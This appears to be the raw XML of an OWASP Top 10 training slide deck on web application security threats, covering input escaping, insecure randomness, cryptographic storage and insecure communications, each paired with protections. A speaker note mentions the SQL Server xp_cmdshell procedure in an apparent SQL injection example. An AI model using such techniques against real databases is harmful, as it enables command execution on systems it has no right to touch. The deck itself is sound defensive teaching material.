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theme/themeOverride4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theme/themeOverride2.xml" ContentType="application/vnd.openxmlformats-officedocument.themeOverr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257" r:id="rId3"/>
    <p:sldId id="31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318" r:id="rId13"/>
    <p:sldId id="328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266" r:id="rId22"/>
    <p:sldId id="267" r:id="rId23"/>
    <p:sldId id="268" r:id="rId24"/>
    <p:sldId id="270" r:id="rId25"/>
    <p:sldId id="271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92" r:id="rId39"/>
    <p:sldId id="276" r:id="rId40"/>
    <p:sldId id="324" r:id="rId41"/>
    <p:sldId id="325" r:id="rId42"/>
    <p:sldId id="275" r:id="rId43"/>
    <p:sldId id="319" r:id="rId44"/>
    <p:sldId id="274" r:id="rId45"/>
    <p:sldId id="326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277" r:id="rId56"/>
    <p:sldId id="278" r:id="rId57"/>
    <p:sldId id="309" r:id="rId58"/>
    <p:sldId id="279" r:id="rId59"/>
    <p:sldId id="315" r:id="rId60"/>
    <p:sldId id="364" r:id="rId61"/>
    <p:sldId id="365" r:id="rId62"/>
    <p:sldId id="366" r:id="rId63"/>
    <p:sldId id="367" r:id="rId64"/>
    <p:sldId id="368" r:id="rId65"/>
    <p:sldId id="369" r:id="rId66"/>
    <p:sldId id="370" r:id="rId67"/>
    <p:sldId id="280" r:id="rId68"/>
    <p:sldId id="281" r:id="rId69"/>
    <p:sldId id="310" r:id="rId70"/>
    <p:sldId id="282" r:id="rId71"/>
    <p:sldId id="283" r:id="rId72"/>
    <p:sldId id="284" r:id="rId73"/>
    <p:sldId id="285" r:id="rId74"/>
    <p:sldId id="286" r:id="rId75"/>
    <p:sldId id="371" r:id="rId76"/>
    <p:sldId id="372" r:id="rId77"/>
    <p:sldId id="373" r:id="rId78"/>
    <p:sldId id="289" r:id="rId79"/>
    <p:sldId id="290" r:id="rId80"/>
    <p:sldId id="321" r:id="rId81"/>
    <p:sldId id="291" r:id="rId82"/>
    <p:sldId id="374" r:id="rId83"/>
    <p:sldId id="375" r:id="rId84"/>
    <p:sldId id="376" r:id="rId85"/>
    <p:sldId id="292" r:id="rId86"/>
    <p:sldId id="293" r:id="rId87"/>
    <p:sldId id="294" r:id="rId88"/>
    <p:sldId id="295" r:id="rId89"/>
    <p:sldId id="296" r:id="rId90"/>
    <p:sldId id="297" r:id="rId91"/>
    <p:sldId id="298" r:id="rId92"/>
    <p:sldId id="299" r:id="rId93"/>
    <p:sldId id="377" r:id="rId94"/>
    <p:sldId id="378" r:id="rId95"/>
    <p:sldId id="379" r:id="rId96"/>
    <p:sldId id="380" r:id="rId97"/>
    <p:sldId id="381" r:id="rId98"/>
    <p:sldId id="382" r:id="rId99"/>
    <p:sldId id="383" r:id="rId100"/>
    <p:sldId id="384" r:id="rId101"/>
    <p:sldId id="393" r:id="rId102"/>
    <p:sldId id="394" r:id="rId103"/>
    <p:sldId id="300" r:id="rId104"/>
    <p:sldId id="301" r:id="rId105"/>
    <p:sldId id="314" r:id="rId106"/>
    <p:sldId id="302" r:id="rId107"/>
    <p:sldId id="385" r:id="rId108"/>
    <p:sldId id="387" r:id="rId109"/>
    <p:sldId id="303" r:id="rId110"/>
    <p:sldId id="304" r:id="rId111"/>
    <p:sldId id="305" r:id="rId112"/>
    <p:sldId id="388" r:id="rId113"/>
    <p:sldId id="389" r:id="rId114"/>
    <p:sldId id="306" r:id="rId115"/>
    <p:sldId id="307" r:id="rId116"/>
    <p:sldId id="308" r:id="rId117"/>
    <p:sldId id="390" r:id="rId118"/>
    <p:sldId id="391" r:id="rId119"/>
    <p:sldId id="312" r:id="rId120"/>
    <p:sldId id="313" r:id="rId1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71B3B48-64A6-4A1F-B563-A8136334250A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OWASP Top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1B8424D-2ABC-493E-956F-D28C091C8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B67941B-237F-4792-86B5-CCEDAF8388E0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OWASP Top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53A1FEC-4564-46E3-BD4A-CB3DC7F64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This approach works by defining a valid or allowable set of characters, and encoding anything outside this set (invalid characters or potential attacks)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Why convert single quote to two single quotes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latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>DBMS_ASSERT is a package from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> oracle that has many functions for input sanitization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> — Escapes special characters in a string for use in a SQL statement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Master.dbo.xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> ? What is this and what this does?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Code explanation?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6/3/2007</a:t>
            </a:r>
            <a:endParaRPr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t>OWASP Top 10</a:t>
            </a:r>
            <a:endParaRPr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BEE711D-E3AC-48ED-9A6B-9102764FB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6/3/2007</a:t>
            </a:r>
            <a:endParaRPr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OWASP Top 10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636E2-8DE0-4ADF-8401-7CD71B9974E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6/3/2007</a:t>
            </a:r>
            <a:endParaRPr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OWASP Top 10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754A3-5151-4F3A-8CB2-90CFAF29A96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6/3/2007</a:t>
            </a:r>
            <a:endParaRPr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OWASP Top 10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5C035-BDC9-4F7C-9F11-55C239D0D10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6/3/2007</a:t>
            </a:r>
            <a:endParaRPr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OWASP Top 10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91C6D-3F34-49E7-B3AB-0A56A305A5D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6/3/2007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OWASP Top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BFE7B-D4CA-4F56-8D1B-00CF5D56950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6/3/2007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OWASP Top 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2C3FA-04AB-4532-AD87-E22C8D7A8D0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6/3/2007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OWASP Top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41259-0E67-4D9E-9E33-D78D745B8AD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6/3/2007</a:t>
            </a:r>
            <a:endParaRPr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OWASP Top 10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F24B6-7F19-4373-A2F1-743490DEB88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6/3/2007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OWASP Top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99090-027D-4610-82DD-658013BBD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6/3/2007</a:t>
            </a:r>
            <a:endParaRPr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t>OWASP Top 10</a:t>
            </a:r>
            <a:endParaRPr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169EF1-16B0-4CFA-85FA-B71EF3DF268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6/3/2007</a:t>
            </a:r>
            <a:endParaRPr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t>OWASP Top 10</a:t>
            </a:r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FA1AA2E-D800-48DF-B9B1-9EB8005F41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" TargetMode="External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wasp.org/images/1/14/OWASP_Top_10_090708.ppt" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_200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How_to_add_validation_logic_to_HttpServletRequest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ksite.com/account/view.aspx?id=23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nksite.com/account/view.aspx?id=2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896"/>
            <a:ext cx="8001000" cy="2744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Web Application Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Threats and Best Practices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28670"/>
            <a:ext cx="9013825" cy="5480068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="365760" indent="-256032" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc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ea typeface="Times New Roman" pitchFamily="-65" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Open Web Application Security Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1" fontAlgn="auto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buSzPct val="68000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="B90E39"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="B90E39"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1" fontAlgn="auto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buSzPct val="68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OWASP is an open group focused on understanding and improving the security of web applications and web services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1" fontAlgn="auto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buSzPct val="68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More than 100 local groups that have volunteer experts from around the world contributing to it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="-256032" fontAlgn="auto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Top Ten Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="603504" lvl="2" indent="-256032" fontAlgn="auto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Describes the most critical web application flaws.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="603504" lvl="2" indent="-256032" fontAlgn="auto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Recommended by U.S Federal Trade Commission for all companies with web applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="603504" lvl="2" indent="-256032" fontAlgn="auto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lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="859536" lvl="2" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="68000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128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OWASP Top 10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EA0017-3E23-4C77-94CF-F6E58EFD9BC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dirty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ontent Placeholder 1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721240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a framework that maintains state for you. For example .NET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Store the state information only at server side only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Secure all potential locations that are accessible to application user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CWE-642: External Control of Critical State Data - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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AD3FAE-50BC-4C9F-B4C2-E141AC2173C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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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4792678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Randomness and unpredictability needs to be present with current security features used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Randomly generating session IDs, temporary file names etc.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If attacker guesses which algorithm is being used to generate random values then we are under threat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CWE-330: Use of Insufficiently Random Values</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0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98CB71-FA63-4C52-B020-D49BA5E08D7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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="788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Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1417638"/>
            <a:ext cx="8686800" cy="4589462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a well-vetted algorithm that is currently considered to be strong by experts in the field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"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CWE-330: Use of Insufficiently Random Values - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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C5BAC5-E419-4AFE-B77B-2B119F4E1F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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="798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1417638"/>
            <a:ext cx="9144001" cy="4589462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b="1" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OWASP Definition:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="260350" indent="-9525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Clr>
                <a:srgbClr val="292929"/>
              </a:buClr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Web applications rarely use cryptographic functions properly to protect data and credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="260350" indent="-9525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Clr>
                <a:srgbClr val="292929"/>
              </a:buClr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Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud.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A8. Insecure Cryptographic Storage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9DDA84-C15D-44D2-9C0E-5456584B198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103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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265754"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="365760" indent="-256032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The majority of Web applications in use today need to store sensitive information (passwords, credit card numbers, proprietary information, etc.) in a secure fashion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032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The use of encryption has become relatively easy for developers to incorporate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-256032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Proper utilization of cryptography, however, can remain elusive by developers overestimating the protection provided by encryption, and underestimating the difficulties of proper implementation and protecting the keys.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A8. Insecure Cryptographic Storage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4F4AF4-E26D-4157-AACE-05A414EEB21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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="634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C24709-2547-4C74-8984-90143945A29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105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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0" y="11969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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A8. Insecure Cryptographic Storage - Illustration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 6" descr="TN_hacker"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum bright="24000" contrast="42000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="3836988"/>
            <a:ext cx="1093788" cy="1268412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="63500" dist="107763" dir="27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64517" name="Group 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="2209800"/>
            <a:ext cx="1455738" cy="1412875"/>
            <a:chOff x="4336" y="1870"/>
            <a:chExt cx="917" cy="890"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64533" name="Rectangle 8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Custom Code</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64534" name="Rectangle 9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Accounts</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64535" name="Rectangle 10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Finance</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64536" name="Rectangle 11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Administration</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64537" name="Rectangle 12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Transactions</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64538" name="Rectangle 13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Communication</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64539" name="Rectangle 14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Knowledge Mgmt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64540" name="Rectangle 15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E-Commerce</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64541" name="Rectangle 16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Bus. Functions</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 17" descr="businesswom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1600200"/>
            <a:ext cx="1050925" cy="1255713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="63500" dist="107763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4519" name="Oval 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="2057400"/>
            <a:ext cx="471488" cy="373063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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64520" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3276600" y="18288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>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>User enters credit card number in form</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64521" name="Oval 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8382000" y="4343400"/>
            <a:ext cx="471488" cy="373063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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64522" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5562600" y="43434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>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Error handler logs CC details because merchant gateway is unavailable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64523" name="Oval 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="4038600"/>
            <a:ext cx="471488" cy="373063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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64524" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2438400" y="39624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>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Malicious insider steals 40 million credit card numbers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64525" name="Freeform 24"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-263347">
            <a:off x="2590800" y="2457450"/>
            <a:ext cx="3508375" cy="207963"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2210"/>
              <a:gd name="T1" fmla="*/ 131 h 131"/>
              <a:gd name="T2" fmla="*/ 1046 w 2210"/>
              <a:gd name="T3" fmla="*/ 3 h 131"/>
              <a:gd name="T4" fmla="*/ 2210 w 2210"/>
              <a:gd name="T5" fmla="*/ 114 h 131"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2210"/>
              <a:gd name="T10" fmla="*/ 0 h 131"/>
              <a:gd name="T11" fmla="*/ 2210 w 2210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0" h="131">
                <a:moveTo>
                  <a:pt x="0" y="131"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="174" y="110"/>
                  <a:pt x="678" y="6"/>
                  <a:pt x="1046" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1414" y="0"/>
                  <a:pt x="1968" y="91"/>
                  <a:pt x="2210" y="114"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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64526" name="AutoShape 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6629400" y="3838575"/>
            <a:ext cx="1558925" cy="390525"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMultidocumen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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Log files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64527" name="Line 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="3581400"/>
            <a:ext cx="0" cy="2762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28" name="Oval 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5776913" y="5410200"/>
            <a:ext cx="471487" cy="373063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Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64529" name="Rectangle 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2957513" y="54102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>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Logs are accessible to all members of IT staff for debugging purposes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64530" name="Freeform 35"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5795963" y="5181600"/>
            <a:ext cx="1531937" cy="876300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 957 w 965"/>
              <a:gd name="T1" fmla="*/ 0 h 552"/>
              <a:gd name="T2" fmla="*/ 805 w 965"/>
              <a:gd name="T3" fmla="*/ 463 h 552"/>
              <a:gd name="T4" fmla="*/ 0 w 965"/>
              <a:gd name="T5" fmla="*/ 531 h 552"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 965"/>
              <a:gd name="T10" fmla="*/ 0 h 552"/>
              <a:gd name="T11" fmla="*/ 965 w 965"/>
              <a:gd name="T12" fmla="*/ 552 h 5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5" h="552">
                <a:moveTo>
                  <a:pt x="957" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="932" y="77"/>
                  <a:pt x="965" y="374"/>
                  <a:pt x="805" y="463"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="645" y="552"/>
                  <a:pt x="168" y="517"/>
                  <a:pt x="0" y="531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64531" name="Freeform 37"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="1878807" y="4698206"/>
            <a:ext cx="609600" cy="2033587"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 957 w 965"/>
              <a:gd name="T1" fmla="*/ 0 h 552"/>
              <a:gd name="T2" fmla="*/ 805 w 965"/>
              <a:gd name="T3" fmla="*/ 463 h 552"/>
              <a:gd name="T4" fmla="*/ 0 w 965"/>
              <a:gd name="T5" fmla="*/ 531 h 552"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 965"/>
              <a:gd name="T10" fmla="*/ 0 h 552"/>
              <a:gd name="T11" fmla="*/ 965 w 965"/>
              <a:gd name="T12" fmla="*/ 552 h 5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5" h="552">
                <a:moveTo>
                  <a:pt x="957" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="932" y="77"/>
                  <a:pt x="965" y="374"/>
                  <a:pt x="805" y="463"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="645" y="552"/>
                  <a:pt x="168" y="517"/>
                  <a:pt x="0" y="531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64532" name="TextBox 34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="6184900"/>
            <a:ext cx="65579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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Ref: www.aspectsecurity.com/documents/Aspect_OWASP_Top_10_Part_2.ppt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Content Placeholder 1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48006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Avoiding storing sensitive information when possible.</a:t>
            </a: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only approved standard algorithms.</a:t>
            </a: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platform specific approved storage mechanisms.</a:t>
            </a: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Ask, read and learn about coding Best Practices for your platform.</a:t>
            </a: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Careful review of all system designs.</a:t>
            </a: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Source code reviews.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A8. Insecure Cryptographic Storage -  Protection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F3A824-684B-4AB6-847F-10883F36112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106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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ontent Placeholder 1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721240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Sensitive information is stored in encrypted form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The encryption standard needs to be chosen correctly. It should be hard to crack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Don’t try to invent new encryption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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CWE-327: Use of a Broken or Risky Cryptographic Algorithm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty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E1557C-66B1-43B2-9F31-272F1825078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107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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Content Placeholder 1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89462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Do not develop your own cryptographic algorithms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well – vetted algorithm that is considered to be strong in the field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Design application in such a way that one cryptographic algorithm can be replaced with another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CWE-327: Use of a Broken or Risky Cryptographic Algorithm - Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty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0257FA-CDFB-49D4-9335-8B215B90FDF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108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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b="1" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OWASP Definition:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="260350" indent="-9525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Clr>
                <a:srgbClr val="292929"/>
              </a:buClr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Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Applications frequently fail to encrypt network traffic when it is necessary to protect sensitive communications.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A9. Insecure Communications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C916DC-CD77-49A9-A272-8FB856DB1CC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109</a:t>
            </a:fld>
